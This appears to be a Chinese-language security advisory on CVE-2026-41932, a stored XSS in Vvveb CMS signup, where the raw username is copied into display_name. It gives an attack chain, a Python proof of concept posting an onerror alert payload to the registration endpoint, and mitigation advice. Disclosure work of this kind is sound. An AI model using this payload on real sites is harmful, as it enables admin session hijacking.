CVE-2026-41932 CVSS 6.1 中危

CVE-2026-41932 VvvebJs存储型XSS漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41932

漏洞类型

存储型跨站脚本 (Stored XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Vvveb

漏洞概述

Vvveb 1.0.8.3之前的版本中存在一个存储型跨站脚本（XSS）漏洞。该漏洞位于客户注册流程中，由于`Signup::addUser()`控制器在数据清理操作之前，直接将原始POST请求中的用户名值复制到了`display_name`字段。攻击者可以在注册时利用用户名字段提交恶意的HTML和脚本标记。尽管系统随后会清除`username`列中的恶意代码，但载荷仍会原样保留在`display_name`列中。当后台或其他用户在未编码的视图中查看渲染该字段时，存储的XSS将被触发执行。

技术细节

该漏洞的根本原因在于数据处理逻辑中的时序问题。在Vvveb的注册控制器中，代码直接引用了用户输入的`username`参数并将其赋值给`display_name`。虽然后续代码会对`username`进行净化处理以防止常规注入，但并未对已赋值的`display_name`进行二次过滤。由于`display_name`在数据库中被持久化存储，且在前端展示时缺乏适当的HTML实体编码，导致攻击者注入的JavaScript代码能够被浏览器解析。攻击者无需经过身份认证即可利用此漏洞，通过构造特定的注册请求植入恶意脚本，一旦管理员访问受影响的管理页面，脚本即在其浏览器上下文中运行，可能导致会话劫持或进一步的控制台攻击。

攻击链分析

STEP 1

步骤1：侦察与准备

攻击者识别出目标网站运行的是Vvveb CMS，且版本低于1.0.8.3，确认存在Signup接口。

STEP 2

步骤2：恶意注册

攻击者构造HTTP POST请求发送给注册接口，在`username`参数中注入包含JavaScript的恶意HTML代码（如<img onerror=...>）。

STEP 3

步骤3：数据持久化

服务器端`Signup::addUser`控制器在清理`username`之前，将其原始值复制到`display_name`并存入数据库。

STEP 4

步骤4：触发漏洞

当管理员或具有权限的用户访问系统后台查看用户列表时，页面渲染`display_name`字段且未进行转义，导致恶意脚本在管理员浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Target URL (Example, needs to be adjusted to actual environment) target_url = "http://localhost/index.php?module=signup&action=addUser" # Malicious payload to be stored in display_name # The payload attempts to execute JavaScript when an admin views the user list xss_payload = "<img src=x onerror=alert('CVE-2026-41932_Stored_XSS')>" # Prepare registration data payload_data = { "username": xss_payload, # This gets copied to display_name before sanitization "email": "[email protected]", "password": "Password123!", "first_name": "Attacker", "last_name": "User" } try: response = requests.post(target_url, data=payload_data) if response.status_code == 200: print("[+] Exploit request sent successfully.") print("[+] Check the admin user list to verify XSS execution.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Vvveb < 1.0.8.3

防御指南

临时缓解措施

建议立即将Vvveb CMS升级至官方发布的最新版本（至少1.0.8.3）。如果无法立即升级，应实施临时缓解措施：在代码层面修改`Signup::addUser`逻辑，确保在将数据赋值给`display_name`之前进行清洗；或者在模板渲染层对所有输出的用户名和显示名使用`htmlspecialchars`等函数进行实体编码，防止浏览器解析HTML标签。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表